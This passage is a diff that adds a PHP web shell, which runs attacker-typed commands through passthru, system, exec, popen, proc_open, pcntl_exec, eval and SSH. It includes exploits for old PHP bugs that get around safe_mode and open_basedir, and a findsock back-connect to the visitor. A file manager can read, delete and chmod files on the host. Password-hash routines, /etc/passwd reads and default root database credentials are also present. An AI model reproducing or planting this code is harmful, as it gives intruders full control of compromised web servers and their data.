+  foreach($objs as $obj) {
+   is_dir($obj) ? rmrf($obj) : unlink($obj);
+  }
+ }
+ if (rmdir($dir)) {
+  return TRUE;
+ } else {
+  return FALSE;
+ }
+}
+// --------------------------------------------- checking for enabled funcs
+function function_enabled($func) {
+ $disabled=explode(",",@ini_get("disable_functions")); 
+ if (empty($disabled)) { 
+  $disabled=array(); 
+ } 
+ else {  
+  $disabled=array_map('trim',array_map('strtolower',$disabled)); 
+ } 
+ return (function_exists($func) && is_callable($func) && !in_array($func,$disabled) ); 
+}
+if (!function_enabled('shell_exec') and !function_enabled('proc_open') and !function_enabled('passthru') and !function_enabled('system') and !function_enabled('exec') and !function_enabled('popen')) {
+ $failflag="1";
+} else {
+ $failflag="0";
+}
+// -------------------------------------------- run command
+function run($c) {
+ if (function_enabled('shell_exec')) {
+  shell_exec($c);
+ } else if(function_enabled('system')) {
+  system($c);
+ } else if(function_enabled('passthru')) {
+  passthru($c);
+ } else if(function_enabled('exec')) {
+  exec($c);
+ } else if(function_enabled('popen')) {
+  $fp=popen($c,'r');
+  @pclose($fp);
+ } else if(function_enabled('proc_open')) {
+  $handle=proc_open($c,$GLOBALS["descriptorspec"],$pipes);
+  while (!feof($pipes[1])) {
+   $buffer.=fread($pipes[1],1024);
+  }
+  @proc_close($handle);
+ }
+}
+// -------------------------------------------- php <= 5.2.9 curl bug
+function sploent529($path) {
+ if (!is_dir('file:')) {
+  mkdir('file:');
+ }
+ $dirz=array();
+ $a=array();
+ $a=explode('/',$path);
+ $c=count($a);
+ $dir='file:/';
+ $d=substr($dir,0,-1);
+ if (!is_dir($d)) {
+  mkdir($d); 
+ }
+ for ($i=0;$i<$c-1;++$i) {
+  $dir.=$a[$i].'/';
+  $d=substr($dir,0,-1);
+  $dirz[]=$d;
+  if (!is_dir($d)) {
+   mkdir($d); 
+  } 
+ }
+ if (!file_exists($path)) {
+  $fp=fopen('file:/'.$path,'w');
+  fclose($fp); 
+ }
+ $ch=curl_init();
+ curl_setopt($ch,CURLOPT_URL,'file:file:////'.$path);
+ curl_setopt($ch,CURLOPT_HEADER,0);
+ if(FALSE==curl_exec($ch)) {
+  echo ("    fail :( either there is no such file or exploit failed ");
+  curl_close($ch);
+  rmrf('file:');
+  echo $pageend;
+  die();
+ } else {
+  curl_close($ch);
+  rmrf('file:');
+  return TRUE;
+ }
+}
+// --------------------------------------------- php 5.1.6 ini_set bug
+function sploent516() {
+ //safe_mode check
+ if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) {
+  ini_restore("safe_mode");
+  if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) {
+   ini_set("safe_mode", FALSE);
+   ini_set("safe_mode", "Off");
+   ini_set("safe_mode", "0");
+   if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) {
+    echo "<font color=\"red\">safe mode: ON</font><br>";
+   } else {
+    echo "<font color=\"green\">safe mode: OFF</font> || hello php-5.1.6 bugs<br>";
+   }
+  } else {
+   echo "<font color=\"green\">safe mode: OFF</font> || hello php-5.1.6 bugs<br>";
+  }
+ } else {
+  echo "<font color=\"green\">safe mode: OFF</font><br>";
+ }
+ //open_basedir check
+ if (ini_get("open_basedir")=="Off" || ini_get("open_basedir")=="/" || ini_get("open_basedir")==NULL || strtolower(ini_get("open_basedir"))=="none") {
+  echo "open_basedir: none<br>";
+ } 
+ else {
+  ini_restore("open_basedir");
+  if (ini_get("open_basedir")=="Off" || ini_get("open_basedir")=="/" || ini_get("open_basedir")==NULL ||  strtolower(ini_get("open_basedir"))=="none") {
+   echo "open_basedir: none || hello php-5.1.6 bugs<br>";
+  } 
+  else {
+   ini_set('open_basedir', '/'); 
+   if (ini_get("open_basedir")=="/") {
+    echo "open_basedir: / || hello php-5.1.6 bugs<br>";
+   } 
+   else {
+    $basedir=TRUE;
+   echo "open_basedir: ".ini_get("open_basedir");
+   }
+  }
+ }
+}
+// --------------------------------------------- findsock
+function findsock($path) {
+ $VERSION = "1.0";
+ echo "findsock start\n  ";
+ $c="".$path." ".$_SERVER['REMOTE_ADDR']." ".$_SERVER['REMOTE_PORT']."";
+ run($c);
+ echo "  exiting\n";
+ exit();
+}
+// --------------------------------------------- search for binary
+function search($bin,$flag) {
+ if ($flag=="1") { 
+  $path="";
+  return $path;
+ } else {
+  if (function_enabled('shell_exec')) {
+   $path=trim(shell_exec('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in'));
+  } else if(function_enabled('exec')) {
+   $path=trim(exec('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in'));
+  } else if(function_enabled('system')) {
+   ob_start();
+   system('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in');
+   $path=trim(ob_get_contents());
+   ob_end_clean();
+  } else if (function_enabled('popen')) { 
+   $hndl=popen('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in', "r");
+   $path=trim(stream_get_contents($hndl));
+   pclose($hndl);
+  } else if(function_enabled('passthru')) {
+   ob_start();
+   passthru('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in');
+   $path=trim(ob_get_contents());
+   ob_end_clean();
+  } else if(function_enabled('proc_open')) {
+  $c='export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin && which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in';
+  $process = proc_open('/bin/sh', $GLOBALS["descriptorspec"], $pipes);
+  if (is_resource($process)) {
+   fwrite($pipes[0],$c);
+   fclose($pipes[0]);
+   $path=trim(stream_get_contents($pipes[1]));
+   fclose($pipes[1]);
+   fclose($pipes[2]);
+   @proc_close($process);
+   }
+  }
+ }
+ return $path;
+}
+// --------------------------------------------- filemanager code by Grinay, updated by 12309
+function owner($path) {
+ $user=fileowner($path);
+ $group=filegroup($path);
+ $data=$user;
+ if(function_enabled('posix_getpwuid')) {
+  $u=posix_getpwuid($user);
+  $data.=" (".$u["name"].")";
+ }
+ $data.=" <br> ".$group;
+ if(function_enabled('posix_getgrgid')) {
+  $g=posix_getgrgid($group);
+  $data.=" (".$g["name"].")&nbsp;";
+ }
+ return $data;
+}
+function view_size($size) {
+ if ($size>=1073741824) { $size=@round($size/1073741824*100)/100 ." GB"; }
+ elseif ($size>=1048576) { $size=$size." B<br>".@round($size/1048576*100)/100 ." MB"; }
+ elseif ($size>=1024) { $size=$size." B<br>".@round($size/1024*100)/100 ." KB"; }
+ else { $size=$size ." B"; }
+ return $size;
+}
+function dirsize($path) { 
+ $totalsize=0; 
+ if ($handle=opendir($path)) { 
+  while (false !== ($file = readdir($handle)))  { 
+   $nextpath=$path . '/' . $file; 
+   if ($file!='.' && $file != '..' && !is_link ($nextpath)) { 
+    if (is_dir($nextpath)) { 
+     $result=dirsize($nextpath); 
+     $totalsize+=$result['size']; 
+    } elseif (is_file($nextpath)) { 
+     $totalsize+=filesize($nextpath); 
+    } 
+   } 
+  } 
+ } 
+ closedir ($handle); 
+ return $totalsize; 
+}
+function scandire($dir) {
+ if (empty($dir)) { $dir=getcwd(); }
+ $dir=chdir($dir) or die('<font color="red">cannot chdir!</font> open_basedir/safe_mode on?<br><br>'.$pageend.'');
+ $dir=getcwd()."/";
+ $dir=str_replace("\\","/",$dir);
+ if (is_dir($dir)) {
+  if ($dh = opendir($dir)) {
+   while (($file = readdir($dh)) !== false) {
+    if(filetype($dir.$file)=="dir") $dire[]=$file;
+    if(filetype($dir.$file)=="file" || filetype($dir.$file)=="link" || filetype($dir.$file)=="socket") $files[]=$file;
+   // if(filetype($dir.$file)=="") $files[]=$file; //debug: strange behavior of filetype() with openbasedir, it returns ""
+   // if(filetype($dir.$file)=="link") $files[]=$file;
+   // echo "file = ".$file." (".filetype($file).")<br>"; #debug
+   // if (is_link($file)) { echo " -&gt ".readlink($file); }; #debug
+   }
+   closedir($dh);
+   @sort($dire);
+   @sort($files);
+   echo "<table border>";
+   echo '<tr><td><form method="post" action="'.$_SERVER['PHP_SELF'].'"><input name="p" type="hidden" value="f">go to dir:<input type="text" name="dir" value="'.$dir.'" size="30"><input name="action" type="hidden" value="viewer"><input type="submit" value="Go"></form></td></tr>';
+   echo "<tr><td>Name</td><td>Type</td><td>Size</td><td>Inode Changed<br>File Modified<br>File Accessed</td><td>Owner<br>Group</td><td>Chmod</td><td>Action</td></tr>";
+   for($i=0;$i<count($dire);$i++) {
+    $link=$dir.$dire[$i];
+    echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Dir</td><td>'.view_size(dirsize($link)).'</td><td><font size="-1">'.date("d/m/Y H:i:s",filectime($link)).'<br>'.date("d/m/Y H:i:s",filemtime($link)).'<br>'.date("d/m/Y H:i:s",fileatime($link)).'</font></td><td>'.owner($link).'</td><td>'.substr(sprintf('%o',fileperms($link)), -4).' <br>('.view_perms_color($link,"string").')</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Touch">T</a></td></tr>';
+   }
+   for($i=0;$i<count($files);$i++) {
+    $linkfile=$dir.$files[$i];
+    echo '<tr><td><a href="#" onclick="document.editor.filee.value=\''.$linkfile.'\'; document.editor.files.value=\''.$linkfile.'\'; document.editor.submit();">'.$files[$i].'</a>';
+    echo '<br></td><td>File</td><td>'.view_size(filesize($linkfile)).'</td><td><font size="-1">'.date("d/m/Y H:i:s",filectime($linkfile)).'<br>'.date("d/m/Y H:i:s",filemtime($linkfile)).'<br>'.date("d/m/Y H:i:s",fileatime($linkfile)).'</font></td><td>'.owner($linkfile).'</td><td>'.substr(sprintf('%o',fileperms($linkfile)), -4).' <br>('.view_perms_color($linkfile,"string").')</td><td> <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a> <a href="#" onclick="document.editor.filee.value=\''.$linkfile.'\'; document.editor.files.value=\''.$linkfile.'\'; document.editor.submit();" title="Edit">E</a> <a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Touch">T</a></td></tr></tr>'; 
+   }
+   echo "</table>";
+  }
+ }
+}
+// --------------------------------------------- crypt functions by Eugen
+function entityenc($str) {
+ $text_array=explode("\r\n", chunk_split($str, 1));
+ for ($n=0; $n < count($text_array) - 1; $n++) {
+  $newstring .= "&#" . ord($text_array[$n]) . ";";
+ }
+ return $newstring;
+}
+function entitydec($str) {
+ $str=str_replace(';', '; ', $str);
+ $text_array=explode(' ', $str);
+ for ($n=0; $n < count($text_array) - 1; $n++) {
+  $newstring .= chr(substr($text_array[$n], 2, 3));
+ }
+ return $newstring;
+}
+function asc2hex($str) {
+ return chunk_split(bin2hex($str), 2, " ");
+}
+function hex2asc($str) {
+ $str=str_replace(" ", "", $str);
+ for ($n=0; $n<strlen($str); $n+=2) {
+  $newstring .=  pack("C", hexdec(substr($str, $n, 2)));
+ }
+ return $newstring;
+}
+// --------------------------------------------- crypt functions by smartman
+$itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
+function to64as($input,$count) {
+ global $itoa64;
+ $output = '';
+ $i = 0;
+ while ($i < $count) {
+  $value = ord($input[$i]);
+  ++$i;
+  $output .= $itoa64{$value & 0x3f};
+  if ($i < $count) $value |= (ord($input[$i]) << 8);
+  $output .= $itoa64{($value>>6) & 0x3f};
+  ++$i;
+  if ($i >= $count) break;
+  if ($i < $count) $value |= (ord($input[$i]) << 16);
+  $output .= $itoa64{($value>>12) & 0x3f};
+  ++$i;
+  if ($i >= $count) break;
+  $output .= $itoa64{($value>>18) & 0x3f};
+ }
+ return $output;
+}
+function to64na($value,$num) {
+ global $itoa64;
+ $output = '';
+ while ($num-1 >= 0) {
+  --$num;
+  $output .= $itoa64{$value & 0x3f};
+  $value >>= 6;
+ }
+ return $output;
+}
+function unap($pwd,$salt,$magic='$1$') {
+ if (substr($salt,0,strlen($magic)) == $magic) $salt = substr($salt,strlen($magic));
+ $salt = explode('$',$salt,1);
+ $salt = substr($salt[0],0,8);
+ $ctx = $pwd.$magic.$salt;
+ $final = md5($pwd.$salt.$pwd,true);
+ for ($pl=strlen($pwd);$pl>=0;$pl-=16) {
+  $ctx .= substr($final,0,($pl>16?16:$pl));
+ }
+ $i = strlen($pwd);
+ while ($i) {
+  $ctx .= ($i&1?chr(0):$pwd{0});
+  $i >>= 1;
+ }
+ $final = md5($ctx,true);
+ for ($i=0;$i<1000;++$i) {
+  $ctx1 = '';
+  $ctx1 .= ($i&1?$pwd:substr($final,0,16));
+  if ($i % 3) $ctx1 .= $salt;
+  if ($i % 7) $ctx1 .= $pwd;
+  $ctx1 .= ($i&1?substr($final,0,16):$pwd);
+  $final = md5($ctx1,true);
+ }
+ $passwd = '';
+ $passwd .= to64na(((int)ord($final{0}) << 16)|((int)ord($final{6}) << 8)|((int)ord($final{12})),4);
+ $passwd .= to64na(((int)ord($final{1}) << 16)|((int)ord($final{7}) << 8)|((int)ord($final{13})),4);
+ $passwd .= to64na(((int)ord($final{2}) << 16)|((int)ord($final{8}) << 8)|((int)ord($final{14})),4);
+ $passwd .= to64na(((int)ord($final{3}) << 16)|((int)ord($final{9}) << 8)|((int)ord($final{15})),4);
+ $passwd .= to64na(((int)ord($final{4}) << 16)|((int)ord($final{10}) << 8)|((int)ord($final{5})),4);
+ $passwd .= to64na(((int)ord($final{11})),2);
+ return $magic.$salt.'$'.$passwd;
+}
+function phpass($pwd,$salt,$count,$prefix) {
+ $hash = md5($salt.$pwd,true);
+ for ($i=0;$i<$count;++$i) {
+  $hash = md5($hash.$pwd,true);
+ }
+ return $prefix.substr($salt,0,8).to64as($hash,16);
+}
+function genSalt($salt,$length=8,$dot=0) {
+ if (strlen($salt)>=$length) return substr($salt,0,$length);
+ global $itoa64;
+ if (!$dot) { $alphabet=substr($itoa64,2); } else { $alphabet=$itoa64; }
+ $output='';
+ for ($i=0;$i<$length;++$i) $output.=$alphabet{mt_rand(0,strlen($alphabet)-1)};
+ return $output;
+}
+function mysql4($pwd) {
+ $nr = 0x50305735;
+ $nr2 = 0x12345671;
+ $add = 7;
+ $charArr = str_split($pwd);
+ foreach ($charArr as $char) {
+  if (in_array($char,array(' ','\n'))) continue;
+  $charVal = ord($char);
+  $nr ^= ((($nr & 63)+$add) * $charVal)+($nr << 8);
+  $nr &= 0x7fffffff;
+  $nr2 += ($nr2 << 8) ^ $nr;
+  $nr2 &= 0x7fffffff;
+  $add += $charVal;
+ }
+ return sprintf('%08x%08x',$nr,$nr2);
+}
+// --------------------------------------------- main code 
+if (!isset($_REQUEST['p'])) { $_REQUEST['p']="s"; }
+switch ($_REQUEST['p']) {
+ case "s":
+  if (empty($_POST["wut"]) and $download != "1") {
+   echo $title;
+   sploent516();
+   if (ini_get("safe_mode")) {
+    $failflag="1";
+   }
+   $shelltext=("uname -a");
+   echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">
+  <font color="green"> haxor@pwnedbox$ </font><textarea name="command" rows="1" cols="50" onkeyup="changeSize(this)">'.$shelltext.'</textarea> <input type="submit" value="go"> <input name="p" type="hidden" value="s"><input type="checkbox" name="down"> download <br><br>';
+   if ($failflag=="1") {
+    echo "all system functions are disabled :( <font color=\"gray\"> but you could try a CGI/SSI shell ;) and still there is<br></font>"; } else {
+    if (function_enabled('passthru')) {
+     echo 'passthru <input name="wut" value="passthru" type="radio" checked><br>';
+    } else { echo 'passthru is disabled!<br>';}
+    if (function_enabled('system')) {
+     echo 'system <input name="wut" value="system" type="radio"><br>';
+    } else { echo 'system is disabled!<br>';}
+    if (function_enabled('exec')) {
+     echo 'exec <input name="wut" value="exec" type="radio"><br>';
+    } else { echo 'exec is disabled!<br>';}
+    if (function_enabled('shell_exec')) {
+     echo 'shell_exec <input name="wut" value="shell_exec" type="radio"><br>';
+    } else { echo 'shell_exec is disabled!<br>';}
+    if (function_enabled('popen')) {
+     echo 'popen <input name="wut" value="popen" type="radio"><br>';
+    } else { echo 'popen is disabled!<br>';}
+    if (function_enabled('proc_open')) {
+     echo 'proc_open <input name="wut" value="proc_open" type="radio"><br>';
+    } else { echo 'proc_open is disabled!<br>';} 
+   }
+   // eval almost always enabled, except there is special option in suhosin-patched php 
+   echo 'php eval() <input name="wut" value="eval" type="radio"><br>';
+   echo '</form>';
+   echo "<br>pcntl_exec:";
+   //determining if pcntl enabled is kinda tricky. debug: add if(dl('pcntl.so')) or check var_dump(get_extension_funcs('pcntl')) ?
+   if (extension_loaded('pcntl')) {
+    if (function_enabled('pcntl_fork')) {
+     if (function_enabled('pcntl_exec')) {
+      echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'"><font color="gray"> interpreter <input name="inter" type="text" size="10" value="/bin/sh"></font> <br><font color="green"> haxor@pwnedbox$ </font><input name="p" type="hidden" value="s"><input name="command" type="text" size="40" value="'.$shelltext.'"> &gt;<input type="radio" name="to" value=">" checked> &gt;&gt;<input type="radio" name="to" value=">>"> <input name="pcfile" type="text" size="20" value="./rezult.html"> ';
+      if (is_writable("./")) {
+       echo "<font color=\"green\">(./ writable)</font>";
+      } else {
+       echo "<font color=\"red\">(./ readonly)</font>";
+      }
+      echo '<br><font color="gray">delete result file after showing contents</font><input type="checkbox" name="delrezult" checked><input type="submit" value="go"> <input type="checkbox" name="down"> download  <input name="wut" type="hidden" value="pcntl"></form>';
+     } else {
+      echo "<br>pcntl_exec is disabled!<br>";
+     }
+    } else {
+     echo "<br>pcntl_fork is disabled!<br>";
+    }
+   } else {
+    echo "<br>fail, no pcntl.so here<br>";
+   }
+   echo "<br>ssh2_exec:";
+   if (extension_loaded('ssh2')) {
+    if (function_enabled('ssh2_connect')) {
+     if (function_enabled('ssh2_exec')) {
+      if ($download != "1") {
+       if (empty($_POST["wut"])) {
+        echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'"> <font color="gray">host: <input name="ssh2host" type="text" size="20" value="localhost"> port: <input name="ssh2port" type="text" size="5" maxlength="5" value="22"> user: <input name="ssh2user" type="text" size="20" value="h4x0r"> password: <input name="ssh2pass" type="text" size="20" value="r0xx0r"> </font><br><font color="green"> haxor@pwnedbox$ </font><input name="command" type="text" size="40" value="uname -a"> <input type="submit" value="go"><input name="p" type="hidden" value="s"> <input type="checkbox" name="down"> download  <input name="wut" type="hidden" value="ssh2"></form>';
+       }
+      }
+     } else {
+      echo "<br>ssh2_exec is disabled!";
+     }
+    } else {
+     echo "<br>ssh2_connect is disabled!";
+    }
+   } else {
+    echo "<br>fail, no ssh2.so here";
+   }
+   echo $pageend;
+  } else {
+   if ($download != "1") {
+    echo $title;
+   }
+   $shelltext=$_POST["command"];
+   $html='<form method="post" action="'.$_SERVER['PHP_SELF'].'"><font color="green"> haxor@pwnedbox$ </font><input name="p" type="hidden" value="s">';
+   $input='<textarea name="command" rows="1" cols="50" onkeyup="changeSize(this)">'.$shelltext.'</textarea> 2>&1 <input type="submit" value="Enter"> <input type="checkbox" name="down"> download <input name="wut" type="hidden" value="';
+   if ($download != "1") {
+   switch ($_POST["wut"]) {
+    case "passthru":
+     if (strnatcmp(version(),"5.2.9") <= 0) {
+      sploent516();
+     }
+     echo "$html"; echo "$input"; echo 'passthru"></form>';
+     break;
+    case "system":
+     if (strnatcmp(version(),"5.2.9") <= 0) {
+      sploent516();
+     }
+     echo "$html"; echo "$input"; echo 'system"></form>';
+     break;
+    case "exec":
+     if (strnatcmp(version(),"5.2.9") <= 0) {
+      sploent516();
+     }
+     echo "$html"; echo "$input"; echo 'exec"></form>';
+     break;
+    case "shell_exec":
+     if (strnatcmp(version(),"5.2.9") <= 0) {
+      sploent516();
+     }
+     echo "$html"; echo "$input"; echo 'shell_exec"></form>';
+     break;
+    case "popen":
+     if (strnatcmp(version(),"5.2.9") <= 0) {
+      sploent516();
+     }
+     echo "$html"; echo "$input"; echo 'popen"></form>';
+     break;
+    case "proc_open":
+     if (strnatcmp(version(),"5.2.9") <= 0) {
+      sploent516();
+     }
+     echo "$html"; echo "$input"; echo 'proc_open"></form>';
+     break;
+    case "eval":
+     if (strnatcmp(version(),"5.2.9") <= 0) {
+      sploent516();
+     }
+     echo "$html"; echo 'php -r \''; echo '<textarea name="command" rows="1" cols="50" onkeyup="changeSize(this)">'.$shelltext.'</textarea> \' <input type="submit" value="Enter">
+     <input name="wut" value="eval" type="hidden"></form>';
+     break;
+    case "pcntl":
+     //sploent516 not needed coz pcntl bypasses safe_mode
+     echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'"><font color="gray"> interpreter <input name="inter" type="text" size="10" value="/bin/sh"></font> <br><font color="green"> haxor@pwnedbox$ </font><input name="p" type="hidden" value="s"><input name="command" type="text" size="40" value="'.$shelltext.'"> &gt;<input type="radio" name="to" value=">" checked> &gt;&gt;<input type="radio" name="to" value=">>"> <input name="pcfile" type="text" size="20" value="'.$_POST["pcfile"].'">';
+     if (is_writable("./")) {
+      echo "<font color=\"green\">(./ writable)</font>";
+     } else {
+      echo "<font color=\"red\">(./ readonly)</font>";
+     }
+     echo ' <br><font color="gray">delete result file after showing contents</font><input type="checkbox" name="delrezult" checked><input type="submit" value="go"> <input type="checkbox" name="down"> download  <input name="wut" type="hidden" value="pcntl"></form>';
+     break;
+    case "ssh2":
+     echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'"><font color="gray"> host: <input name="ssh2host" type="text" size="20" value="'.$_POST["ssh2host"].'"> port: <input name="ssh2port" type="text" size="5" maxlength="5" value="'.$_POST["ssh2port"].'"> user: <input name="ssh2user" type="text" size="20" value="'.$_POST["ssh2user"].'"> password: <input name="ssh2pass" type="text" size="20" value="'.$_POST["ssh2pass"].'"> </font><br><font color="green"> haxor@pwnedbox$ </font> <input name="command" type="text" size="40" value="'.$shelltext.'"> <input type="submit" value="go"><input name="p" type="hidden" value="s"> <input type="checkbox" name="down"> download  <input name="wut" type="hidden" value="ssh2"></form>';
+     break;
+   }
+   }
+  }
+  if (!empty($_POST["wut"])) {
+   if ($download != "1") {
+    echo "<textarea cols=\"80\" rows=\"40\">";
+   }
+   switch ($_POST["wut"]) {
+    case "passthru":
+     passthru($_POST["command"]." 2>&1");
+     break;
+    case "system":
+     system($_POST["command"]." 2>&1");
+     break;
+    case "exec":
+     exec($_POST["command"]." 2>&1",$out);
+     echo join("\n",$out);
+     break;
+    case "shell_exec":
+     $out=shell_exec($_POST["command"]." 2>&1");
+     echo "$out";
+     break;
+    case "popen":
+     $hndl=popen($_POST["command"]." 2>&1", "r");
+     $read=stream_get_contents($hndl);
+     echo $read;
+     pclose($hndl);
+     break;
+    case "proc_open":
+     $process = proc_open('/bin/sh', $descriptorspec, $pipes);
+     if (is_resource($process)) {
+      fwrite($pipes[0],$_POST["command"]);
+      fclose($pipes[0]);
+      echo stream_get_contents($pipes[1]);
+      fclose($pipes[1]);
+      echo stream_get_contents($pipes[2]);
+      fclose($pipes[2]);
+      @proc_close($process);
+     }
+     break;
+    case "pcntl":
+     $shelltext=$_POST["command"];
+     switch (pcntl_fork()) {
+      case 0:
+       pcntl_exec($_POST["inter"],array("-c","".$_POST["command"]." ".$_POST["to"]." ".$_POST["pcfile"]));
+       exit(0);
+      default:
+       break;
+     }
+     sleep(1);
+     $fh=fopen("".$_POST["pcfile"]."","r");
+     if (!$fh) { echo "can`t fopen ".$_POST["pcfile"].", seems that we failed :("; }
+     else {
+      $rezult=fread($fh,filesize($_POST["pcfile"]));
+      fclose($fh);
+      echo $rezult;
+      if ($_POST["delrezult"] == "on") { unlink($_POST["pcfile"]); }
+     }
+     break;
+    case "eval":
+     eval($_POST["command"]);
+     break;
+    case "ssh2":
+     $connection=ssh2_connect($_POST["ssh2host"], $_POST["ssh2port"]) or die ("cant connect. host/port wrong?");
+     //using knowingly wrong username to test auth. methods
+     $auth_methods = ssh2_auth_none($connection, '12309tezt');
+     if (in_array('password', $auth_methods)) {
+      $connection=ssh2_connect($_POST["ssh2host"], $_POST["ssh2port"]) or die ("cant connect. host/port wrong?"); //need to connect again after failed login
+      if (ssh2_auth_password($connection, ''.$_POST["ssh2user"].'', ''.$_POST["ssh2pass"].'')) {
+       $stream=ssh2_exec($connection, $shelltext); 
+       stream_set_blocking($stream, true);
+       $data = "";
+       while ($buf = fread($stream,4096)) {
+        $data .= $buf;
+       }
+       fclose($stream);
+       echo $data;
+      } else {
+       echo "cant login. user/pass wrong?";
+      }
+     } else {
+      echo 'fail, no "password" auth method';
+     }     
+     break;
+   }
+   if ($download != "1") {
+    echo "</textarea>";
+   }
+  }
+ break; 
+// --------------------------------------------- shell end; file operations
+ case "f":
+  if ($download != "1") {
+   echo $title;
+   echo "<font color=\"gray\">";
+   echo "current dir: ".getcwd()."<br>";
+   sploent516();
+   echo "<br>--------------------------------<br></font>";
+  }
+  if (empty($_POST["filer"]) and $download != "1" and empty($_POST["edt"]) and empty($_POST["sqlr"]) and empty($_POST["sqlu"]) and empty($_POST["upload"])) {
+  echo '<a href="#" onclick="showTooltip(7)" id="link"> &gt;&gt; read/upload/edit file &lt;&lt; </a><br><br>
+  <div id="7" style="display: none">';
+   $ololotext="/home/USER/public_html/DOMAIN/index.php";
+   echo '<font color="blue">---> read file </font><br>';
+   echo "php file_get_contents:<br>";
+   echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'"><font color="green"> haxor@pwnedbox$</font> cat <input name="filename" type="text" maxlength="500" size="50" value="'.$ololotext.'">
+   <input name="filer" type="hidden" value="php"><input type="submit" value="Enter"><input name="p" type="hidden" value="f"> <input type="checkbox" name="down"> download </form>';
+   //curl
+   if (strnatcmp(version(),"5.2.9") <= 0) {
+    echo "<br> curl exploit: <br>";
+    if (!extension_loaded('curl')) {
+     echo "&nbsp;&nbsp;fail, curl is required<br>";
+    } else {
+     echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'"><font color="green"> haxor@pwnedbox$</font> cat <input name="filename" type="text" maxlength="500" size="50" value="'.$ololotext.'">
+     <input name="filer" type="hidden" value="curl"><input type="submit" value="Enter"><input name="p" type="hidden" value="f"> <input type="checkbox" name="down"> download </form>';
+    }
+   }
+  } else {
+   switch ($_POST["filer"]) {
+    case "php":
+     $ololotext=($_POST["filename"]);
+     if ($download != "1") {
+      echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'"><font color="green">haxor@pwnedbox$ </font>cat
+      <input name="filename" type="text" maxlength="500" size="50" value="'.$ololotext.'">
+      <input name="filer" type="hidden" value="php"><input type="submit" value="Enter"><input name="p" type="hidden" value="f"><input type="checkbox" name="down"> download </form>';
+     }
+     if (!empty($_POST["filename"])) { 
+      if ($download != "1") {
+       echo '<font color="gray">';
+       echo "<textarea cols=\"80\" rows=\"40\">";
+      }
+      $contents=file_get_contents($_POST["filename"]) or die("failed. bad permissions or no such file?".$pageend."");
+      echo $contents;
+      if ($download != "1") {
+       echo "</textarea>";
+      }
+      echo $pageend;
+      die(); 
+     }
+     break;  
+    case "curl":
+     $ololotext=($_POST["filename"]);
+     if ($download != "1") {
+      echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'"><font color="green">haxor@pwnedbox$ </font>cat
+      <input name="filename" type="text" maxlength="500" size="50" value="'.$ololotext.'">
+      <input name="filer" type="hidden" value="curl"><input type="submit" value="Enter"><input name="p" type="hidden" value="f"><input type="checkbox" name="down"> download </form>';
+     }
+     if (!empty($_POST["filename"])) { 
+      if ($download != "1") {
+       echo '<font color="gray">';
+       echo "<textarea cols=\"80\" rows=\"40\">";
+      }
+      sploent529($_POST["filename"]);
+     }
+    break;
+   }
+  }
+  // curl + file_get_contents end
+  if ($download != "1" and empty($_POST["edt"]) and empty($_POST["sqlu"])) {
+   echo "<br>mysql:<br>";
+   if (empty($_POST["sqlr"])) {
+    $user="root";
+    $pass="12345";
+    $db="test";
+    $host="localhost";
+    $port="3306";
+    $file="/etc/passwd";
+   } else {
+    $user=$_POST['user'];
+    $pass=$_POST['pass'];
+    $db=$_POST['db'];
+    $host=$_POST['host'];
+    $port=$_POST['port'];
+    $file=$_POST['file'];
+   }
